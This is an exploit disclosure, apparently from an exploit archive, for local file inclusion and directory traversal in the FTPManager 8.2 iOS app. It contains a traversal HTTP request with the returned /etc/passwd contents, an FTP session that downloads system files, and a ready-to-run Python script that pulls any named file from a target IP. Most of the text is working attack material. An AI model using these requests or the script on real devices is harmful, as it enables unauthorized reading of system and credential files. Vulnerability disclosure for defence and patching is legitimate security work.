FTPManager 8.2 Local File Inclusion / Directory Traversal

FTPManager version 8.2 suffers from local file inclusion and directory traversal vulnerabilities.


SHA-256 | 3e761447e17269780279f6f239a28cde76f4d7d642e4fd2bf87303f7df3f583c

# Exploit Title: FTPManager 8.2 Local File inclusion
# Date: Sep 6, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link:
https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186
# Version: 8.2
# Tested on: Ios 15.6



GET /../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.1.178:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close




------------------

HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Content-Type: application/octet-stream
Last-Modified: Wed, 13 Jul 2022 10:35:46 GMT
Date: Tue, 06 Sep 2022 03:05:05 GMT
Content-Length: 2581
Cache-Control: max-age=3600, public
Etag: 1152921500312311384/1657708546/0

##
# User Database
#
# This file is the authoritative user database.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
_usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
_ondemand:*:249:249:On Demand Resource
Daemon:/var/db/ondemand:/usr/bin/false
_findmydevice:*:254:254:Find My Device
Daemon:/var/db/findmydevice:/usr/bin/false
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false
_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false
_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false
_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false
_driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false
_diskimagesiod:*:271:271:DiskImages IO
Daemon:/var/db/diskimagesiod:/usr/bin/false
_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false
_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false
_rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false
_accessoryupdater:*:278:278:Accessory Update
Daemon:/var/db/accessoryupdater:/usr/bin/false
_knowledgegraphd:*:279:279:Knowledge Graph
Daemon:/var/db/knowledgegraphd:/usr/bin/false
_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false
_sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false
_trustd:*:282:282:trustd:/var/empty:/usr/bin/false
_mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false
_darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false
_notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false



---------------------------------------------------

# Exploit Title: FTPManager 8.2 Directory Traversal (ftp)
# Date: Sep 6, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link:
https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186
# Version: 8.2
# Tested on: ios 15.6


#ftp 192.168.1.178 2121
Connected to 192.168.1.178.
220 ---------- Welcome to FTPManager ----------
Name (192.168.1.178:chokri):
230 User chokri logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /../../../../../../../../../../../../../../../../
250 OK. Current directory is
/../../../../../../../../../../../../../../../../
ftp> ls
200 PORT command successful.
150 Accepted data connection
total 10
drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr
drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin
drwxr-xr-x 0 root wheel 576 Jan 01 1970 sbin
drwxr-xr-x 0 root wheel 160 Jan 01 1970 System
drwxr-xr-x 0 root wheel 672 Jan 01 1970 Library
drwxr-xr-x 0 root wheel 224 Jan 01 1970 private
drwxr-xr-x 0 root wheel 1132 Jan 01 1970 dev
drwxr-xr-x 0 root admin 3968 Jan 01 1970 Applications
drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer
drwxr-xr-x 0 root admin 64 Jan 01 1970 cores
WARNING! 10 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
ftp> cd private/etc
250 OK. Current directory is
/../../../../../../../../../../../../../../../../private/etc
ftp> get passwd
local: passwd remote: passwd
200 PORT command successful.
150 Opening BINARY mode data connection for 'passwd'.
226 Transfer complete.
2581 bytes received in 0.00 secs (11.5020 MB/s)
ftp> get services
local: services remote: services
200 PORT command successful.
150 Opening BINARY mode data connection for 'services'.
226 Transfer complete.
677977 bytes received in 0.17 secs (3.8257 MB/s)



---------------------------------------------------




# Exploit Title: FTPManager 8.2 Local File inclusion (ftp) python
# Date: Sep 6, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link:
https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186
# Version: 8.2
# Tested on: ios 15.6


from ftplib import FTP
import argparse

help = " FTPManager 8.2 Local File inclusion by chokri hammedi"
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--target", help="Target IP", required=True)
parser.add_argument("--file", help="File To Open eg: etc/passwd")

args = parser.parse_args()


ip = args.target
port = 2121 # Default Port
files = args.file



ftpConnection = FTP()
ftpConnection.connect(host=ip, port=port)
ftpConnection.login();

def downloadFile():

ftpConnection.cwd('/../../../../../../../../../../../../../../../../')
ftpConnection.retrbinary(f"RETR {files}", open('data.txt',
'wb').write)
ftpConnection.close()
file = open('data.txt', 'r')
print (f"[***] The contents of {files}\n")
print (file.read())

downloadFile()

Related Posts